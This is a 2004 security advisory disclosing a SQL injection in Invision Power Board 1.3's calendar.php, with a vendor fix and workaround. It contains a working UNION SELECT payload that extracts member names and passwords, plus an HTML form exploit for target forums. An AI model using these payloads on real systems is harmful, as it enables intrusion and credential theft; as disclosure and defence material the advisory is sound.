[SCSA-025] Invision Power Board SQL Injection Vulnerability

2004-01-06T00:00:00
ID SECURITYVULNS:DOC:5597
Type securityvulns
Reporter Securityvulns
Modified 2004-01-06T00:00:00

Description

====================================================================== Security Corporation Security Advisory [SCSA-025]

Invision Power Board SQL Injection Vulnerability

PROGRAM: Invision Power Board HOMEPAGE: http://www.invisionboard.com VULNERABLE VERSIONS: 1.3 FINAL RISK: MEDIUM/HIGH IMPACT: SQL Injection

RELEASE DATE: 2004-01-03

====================================================================== TABLE OF CONTENTS ======================================================================

1..........................................................DESCRIPTION 2..............................................................DETAILS 3.............................................................EXPLOITS 4............................................................SOLUTIONS 5...........................................................WORKAROUND 6..................................................DISCLOSURE TIMELINE 7..............................................................CREDITS 8...........................................................DISCLAIMER 9...........................................................REFERENCES 10............................................................FEEDBACK

1. DESCRIPTION

Invision Power Board (IPB) is a professional forum system that has been built from the ground up with speed and security in mind, taking advantage of object oriented code, highly-optimized SQL queries, and the fast PHP engine. A comprehensive administration control panel is included to help you keep your board running smoothly. Moderators will also enjoy the full range of options available to them via built-in tools and moderators control panel. Members will appreciate the ability to subscribe to topics, send private messages, and perform a host of other options through the user control panel. It is used by millions of people over the world.

2. DETAILS

  • SQL Injection :

A vulnerability has been discovered in the sources/calendar.php file that allows unauthorized users to inject SQL commands.

Vulnerable code :


[...]

$this->chosen_month = ( ! intval($ibforums->input['m']) ) ? $this->now_date['mon'] : $ibforums->input['m'];

[...]

$recurring = array();

[...]

$DB->query("SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month={$this->chosen_month}) ) ");

while ( $rec = $DB->fetch_row() ) { $recurring[] = $rec; }

$events = array();

$DB->query("SELECT * FROM ibf_calendar_events WHERE event_repeat <> 1 AND month={$this->chosen_month} AND year={$this->chosen_year} OR (event_ranged=1 AND ( unix_stamp < $timenow AND end_unix_stamp > $timenow ) ) ");


$ibforums->input['m'] is the variable $m which was sent by the user.

We see that if intval($ibforums->input['m']) doesn't return numerical value, then the variable $this->chosen_month will be worth the number of the month in which we are.

However if it returns a numerical value, then $this->chosen_month will have for value that brought in by the user, that of $ibforums->input['m'].

This will have for consequence that, if we enter as value in $m for example 'aaaaa', $this->chosen_month will see attributing a value by default to the script. A priori we cannot thus enter another thing than number.

But, if intval('aaaa') do not return numerical value, intval('2aaaaa') returns one! The argument just has thus to BEGIN with a number.

Thus if we give in $m the value '2hophophop', $this->chosen_month will be '2hophophop'

We execute the following request :


SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month={$this->chosen_month}) )


As it is a request of type SELECT, we can use for example the clause UNION.

As the result of the second request has to be the same type as the first one, and as in the first one we extract everything (*) the elements of the table ibf_calendar_events, we need to know its structure, which is :


CREATE TABLE ibf_calendar_events ( eventid mediumint(8) NOT NULL auto_increment, userid mediumint(8) NOT NULL default '0', year int(4) NOT NULL default '2002', month int(2) NOT NULL default '1', mday int(2) NOT NULL default '1', title varchar(254) NOT NULL default 'no title', event_text text NOT NULL, read_perms varchar(254) NOT NULL default '*', unix_stamp int(10) NOT NULL default '0', priv_event tinyint(1) NOT NULL default '0', show_emoticons tinyint(1) NOT NULL default '1', rating smallint(2) NOT NULL default '1', event_ranged tinyint(1) NOT NULL default '0', event_repeat tinyint(1) NOT NULL default '0', repeat_unit char(2) NOT NULL default '', end_day int(2) default NULL, end_month int(2) default NULL, end_year int(4) default NULL, end_unix_stamp int(10) default NULL, event_bgcolor varchar(32) NOT NULL default '', event_color varchar(32) NOT NULL default '', PRIMARY KEY (eventid), KEY unix_stamp (unix_stamp) );


We can see that the result of the request should be : INT,INT,INT,INT,INT,VARCHAR,TEXT,VARCHAR,INT,INT,INT,INT,INT,INT,CHAR(2),INT, INT,INT,INT,VARCHAR,VARCHAR

Thus if we give in $this->chosen_month (in $m) the value: 2 )) UNION SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1/*

The request executed will be : SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month=2 )) UNION SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0,0,0,0,0,0,0,0,f.id,f.name, f.password FROM ibf_members m,ibf_forums f WHERE 1/*)

And these two requests will be executed: - SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month=2 )) - SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1

The second request returns four 0, the id, the name, the password and the ip of the member with thirteen 0 for every member.

ATTENTION! The request is executed but nothing is displayed!

Indeed, later in the script another request is executed: SELECT * FROM ibf_calendar_events WHERE event_repeat <> 1 AND month={$this->chosen_month} AND year={$this->chosen_year} OR (event_ranged=1 AND ( unix_stamp < $timenow AND end_unix_stamp > $timenow ) )

What gives the execution of : SELECT * FROM ibf_calendar_events WHERE event_repeat <> 1 AND month= 2 )) UNION SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1/*

What generates an error. But the request is executed first time, and there are naturally other possible uses.

3. EXPLOITS

  • SQL Injection :

--------------------IPBexploit.html--------------------

<html> <head><title> Invision Power Board Free 1.3 FINAL SQL Injection Problems </title></head> <body> <form action='/index.php?act=calendar' method='post' onsubmit="this.m.value='2 )) UNION '+this.request.value+'#';this.action=this.url.value+this.action;"> <b>IPB directory URL :</b> <input type='text' size='45' name='url' value='http://forum.target.com'><br><br> <b>SQL SELECT REQUEST :</b> <input type='text' size='80' name='request' value='SELECT * FROM ibf_calendar_events'><br><br> <u>Attention :</u> The request result MUST have this structure :<br><br> INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,INT,INT,CHAR(2),INT,INT, INT,INT,STR,STR<br><br> <input type='hidden' name='y' value='2004'> <input type='hidden' name='m'> <input type='submit' value='Execute'> </form> <br><br><br> <p align="right">A patch can be found on <a href="http://www.phpsecure.info" target="_blank">phpSecure.info</a>.<br> For more informations about this exploit : <a href="http://www.security-corporation.com/advisories-025.html" target="_blank"> Security-Corporation.com</a></p> </body> </html>

--------------------IPBexploit.html--------------------

4. SOLUTIONS

You can found patch at the following link : http://www.phpsecure.info

The Invision Power Services was notified and have released a fix : http://forums.invisionpower.com/index.php?act=ST&f=1&t=108786

5. WORKAROUND

In sources/calendar.php replace the following lines :


$this->chosen_month = ( ! intval($ibforums->input['m']) ) ? $this->now_date['mon'] : $ibforums->input['m']; $this->chosen_year = ( ! intval($ibforums->input['y']) ) ? $this->now_date['year'] : $ibforums->input['y'];


by :


$this->chosen_month = ( ! intval($ibforums->input['m']) ) ? $this->now_date['mon'] : intval($ibforums->input['m']); $this->chosen_year = ( ! intval($ibforums->input['y']) ) ? $this->now_date['year'] : intval($ibforums->input['y']);


6. DISCLOSURE TIMELINE

30/12/2003 Vulnerability discovered 30/12/2003 Vendor notified 02/01/2004 Vendor response 02/01/2004 Security Corporation clients notified 02/01/2004 Started e-mail discussions 03/01/2004 Last e-mail received 03/01/2004 Public disclosure

7. CREDITS

frog-m@n <frog-man@security-corporation.com> from http://www.phpsecure.info is credited with this discovery

NorXbe from http://www.ihcteam.org is greeted.

8. DISLAIMER

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

9. REFERENCES

  • Original Version: http://www.security-corporation.com/advisories-025.html

  • Version Française: http://www.security-corporation.com/index.php?id=advisories&a=025-FR

10. FEEDBACK

Please send suggestions, updates, and comments to:

Security Corporation http://www.security-corporation.com advisory@security-corporation.com